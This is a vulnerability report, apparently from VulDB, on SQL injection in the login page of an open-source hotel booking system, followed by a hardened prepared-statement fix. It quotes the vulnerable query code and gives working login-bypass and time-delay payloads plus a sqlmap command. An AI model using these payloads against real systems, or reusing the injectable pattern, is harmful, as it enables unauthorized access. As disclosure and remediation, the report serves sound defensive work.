| Field | Value |
|---|---|
| Title | SQL injection in Online-Booking-And-Hotel-Management-System |
| Source | https://github.com/Rifatur/Online-Booking-And-Hotel-Management-System |
| User | binghuang (UID 30681) |
| Submitted | 05/08/2022 10:25 (4 years ago) |
| Moderated | 05/08/2022 12:38 (2 hours later) |
| Status | accepted |
| VulDB entry | 205657 [Rigatur Online Booking and Hotel Management System aff6409 POST Request login.php email/pass SQL Injection] |
| Points | 20 |

Description

In file "login.php" line 50:

```php
$Email=$_POST['email'];
$pass=$_POST['pass'];
$query="SELECT * FROM `employees` WHERE email='$Email'AND mep_password='$pass'";
$runQuery=mysqli_query($conn,$query);
$rowQuery= mysqli_num_rows($runQuery);
```

Close the quote with `'#`, so sending a POST request like "[email protected]&pass=admin'#" can successfully log in.

Try WAITFOR DELAY injection: POST "[email protected]&pass=admin' and sleep(5)#". The page successfully delayed the response by 5 seconds.

Try more attacks with `python sqlmap.py -u "xxx/Online-Booking-And-Hotel-Management-System/admin/login.php" --data="[email protected]&pass=admin"`.
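The fix for the fragment quoted in the description is to keep user input out of the SQL text. The following is an added example of a hardened replacement, not code from the project; it assumes `$conn` is an open `mysqli` connection, that `mysqlnd` is available for `get_result()`, and that `employees.mep_password` holds a `password_hash()` digest rather than the plaintext the original query compares.

```php
<?php
// Added example, not the project's code: hardened version of the login.php
// fragment. Assumes $conn is an open mysqli connection and that
// `employees`.`mep_password` stores a password_hash() digest (assumption).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function authenticateEmployee(mysqli $conn, string $email, string $pass): ?array
{
    // A bound parameter is sent separately from the statement text, so a
    // quote, a trailing '#' comment marker or an appended sleep() call in
    // the email field is matched literally and cannot alter the query.
    $stmt = $conn->prepare('SELECT * FROM `employees` WHERE email = ? LIMIT 1');
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Compare the password in PHP, never inside the query string; the
    // combined check also avoids leaking whether the email exists.
    if ($row === null || !password_verify($pass, $row['mep_password'])) {
        return null;
    }
    unset($row['mep_password']);
    return $row;
}

$email    = $_POST['email'] ?? '';
$pass     = $_POST['pass'] ?? '';
$employee = authenticateEmployee($conn, $email, $pass);
if ($employee === null) {
    http_response_code(401);
    exit('Invalid credentials');
}
// $employee now holds the authenticated row for session setup.
```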